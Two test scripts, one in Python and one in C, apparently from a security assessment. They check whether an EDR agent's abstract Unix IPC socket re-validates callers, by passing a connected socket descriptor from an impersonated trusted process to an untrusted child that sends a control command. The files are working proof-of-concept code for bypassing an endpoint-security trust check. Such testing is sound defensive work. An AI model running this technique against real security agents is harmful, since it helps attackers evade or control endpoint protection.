File: scripts/tcs/delegation_test.py
#!/usr/bin/env python3
"""
delegation_test.py - Scenario T12: Connected socket fd inheritance.
Attempts to check if the agent validates per-message or only at connect-time.
Flow:
1. Connects to @agent_ipc_<token> as a trusted binary (via bind mount impersonation).
2. Spawns an untrusted helper (this python script itself) with the open connected socket descriptor.
3. The helper sends a message over the inherited socket fd.
4. Checks if the agent accepts it or resets the connection.
"""
import os
import socket
import struct
import sys
import subprocess

DEFAULT_SELECTOR = "a2d6ed9cfc61e58c" # 'control status' method

def find_agent_ipc():
    for line in open("/proc/net/unix").read().splitlines()[1:]:
        p = line.split()
        if len(p) >= 8 and p[-1].startswith("@agent_ipc_"):
            return p[-1]
    return None

def main_child(fd_num):
    # This is the untrusted helper executing from a python pathname (not /opt/edr-x/bin/edrctl)
    print(f"[Child] PID={os.getpid()} resolved_exe={os.readlink('/proc/self/exe')} using inherited fd={fd_num}")
    s = socket.fromfd(fd_num, socket.AF_UNIX, socket.SOCK_SEQPACKET)
    s.settimeout(3.0)
    
    selector = bytes.fromhex(DEFAULT_SELECTOR)
    try:
        # Send length header + payload
        s.send(struct.pack("<Q", len(selector)))
        s.send(selector)
        print("[Child] Message sent. Receiving response...")
        hdr = s.recv(8)
        if len(hdr) < 8:
            print(f"[Child] FAIL: short header ({len(hdr)}B)")
            return
        n = struct.unpack("<Q", hdr)[0]
        body = s.recv(n) if n else b""
        print(f"[Child] SUCCESS! Got {len(body)}-byte response: {body.hex()}")
    except OSError as e:
        print(f"[Child] FAIL: errno={e.errno} {e.strerror}")

def main_parent():
    name = find_agent_ipc()
    if not name:
        print("ERROR: agent_ipc not found")
        sys.exit(1)
        
    print(f"[Parent] PID={os.getpid()} Connecting to socket={name}...")
    addr = b"\0" + name[1:].encode()
    s = socket.socket(socket.AF_UNIX, socket.SOCK_SEQPACKET)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_PASSCRED, 1)
    s.connect(addr)
    fd = s.fileno()
    
    # We want to clear Close-On-Exec on the fd so that it stays open in the child process.
    # Python sets close-on-exec by default since 3.4. We can clear it using os.set_inheritable.
    os.set_inheritable(fd, True)
    
    print(f"[Parent] Connected successfully on fd={fd}. Spawning child process...")
    
    # Re-run this script with the --child argument, passing the fd number
    # This invokes python3, so /proc/<child_pid>/exe resolves to /usr/bin/python3.12 (untrusted).
    cmd = [sys.executable, __file__, "--child", str(fd)]
    p = subprocess.Popen(cmd, close_fds=False)
    p.wait()
    s.close()

if __name__ == "__main__":
    if len(sys.argv) > 2 and sys.argv[1] == "--child":
        main_child(int(sys.argv[2]))
    else:
        main_parent()

File: scripts/tcs/delegation_test.c
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/types.h>
#include <errno.h>
#include <stdint.h>
#include <fcntl.h>
#include <stddef.h>

static const unsigned char DEFAULT_SELECTOR[8] = {
    0xa2, 0xd6, 0xed, 0x9c, 0xfc, 0x61, 0xe5, 0x8c
};

static int find_agent_ipc(char *out, size_t out_len) {
    FILE *fp = fopen("/proc/net/unix", "r");
    if (!fp) {
        perror("fopen /proc/net/unix");
        return -1;
    }
    char line[512];
    while (fgets(line, sizeof(line), fp)) {
        char *name = strstr(line, "@agent_ipc_");
        if (!name) continue;
        name[strcspn(name, " \t\r\n")] = '\0';
        if (strlen(name) + 1 > out_len) {
            fclose(fp);
            return -1;
        }
        strcpy(out, name);
        fclose(fp);
        return 0;
    }
    fclose(fp);
    return -1;
}

int do_child(int fd) {
    printf("[Child] PID=%d resolved_exe=", getpid());
    char exe_path[256] = {0};
    if (readlink("/proc/self/exe", exe_path, sizeof(exe_path)-1) > 0) {
        printf("%s\n", exe_path);
    } else {
        printf("unknown\n");
    }
    
    // Attempt to send on the inherited fd
    uint64_t len = 8;
    if (send(fd, &len, sizeof(len), 0) != sizeof(len)) {
        perror("[Child] send length failed");
        return 1;
    }
    if (send(fd, DEFAULT_SELECTOR, sizeof(DEFAULT_SELECTOR), 0) != sizeof(DEFAULT_SELECTOR)) {
        perror("[Child] send selector failed");
        return 1;
    }
    
    printf("[Child] Message sent. Receiving response...\n");
    unsigned char hdr[8];
    ssize_t got = recv(fd, hdr, sizeof(hdr), 0);
    if (got < 0) {
        perror("[Child] recv header failed");
        return 1;
    }
    printf("[Child] recv header got %zd bytes\n", got);
    if (got == 8) {
        uint64_t body_len;
        memcpy(&body_len, hdr, 8);
        printf("[Child] response body len = %lu\n", (unsigned long)body_len);
        
        unsigned char body[1024];
        if (body_len <= sizeof(body)) {
            got = recv(fd, body, body_len, 0);
            if (got > 0) {
                printf("[Child] SUCCESS! Got body data of length %zd\n", got);
            }
        }
    }
    return 0;
}

int main(int argc, char **argv) {
    if (argc > 2 && strcmp(argv[1], "--child") == 0) {
        return do_child(atoi(argv[2]));
    }
    
    char name[128];
    if (find_agent_ipc(name, sizeof(name)) != 0) {
        fprintf(stderr, "find_agent_ipc failed\n");
        return 1;
    }
    
    int fd = socket(AF_UNIX, SOCK_SEQPACKET, 0);
    if (fd < 0) {
        perror("socket");
        return 1;
    }
    
    int one = 1;
    if (setsockopt(fd, SOL_SOCKET, SO_PASSCRED, &one, sizeof(one)) != 0) {
        perror("setsockopt SO_PASSCRED");
        close(fd);
        return 1;
    }
    
    struct sockaddr_un addr;
    memset(&addr, 0, sizeof(addr));
    addr.sun_family = AF_UNIX;
    addr.sun_path[0] = '\0';
    memcpy(addr.sun_path + 1, name + 1, strlen(name)-1);
    socklen_t addr_len = offsetof(struct sockaddr_un, sun_path) + strlen(name);
    
    if (connect(fd, (struct sockaddr *)&addr, addr_len) != 0) {
        perror("connect");
        close(fd);
        return 1;
    }
    
    printf("[Parent] Connected successfully! fd=%d\n", fd);
    
    // Clear close-on-exec to ensure child can inherit it.
    int flags = fcntl(fd, F_GETFD);
    if (flags >= 0) {
        fcntl(fd, F_SETFD, flags & ~FD_CLOEXEC);
    }
    
    // Now execve a completely different binary (e.g. /tmp/delegation_child)
    char fd_str[16];
    sprintf(fd_str, "%d", fd);
    char *child_args[] = {"/tmp/delegation_child", "--child", fd_str, NULL};
    char *child_env[] = {NULL};
    
    printf("[Parent] Executing child helper...\n");
    execve("/tmp/delegation_child", child_args, child_env);
    perror("execve");
    close(fd);
    return 1;
}
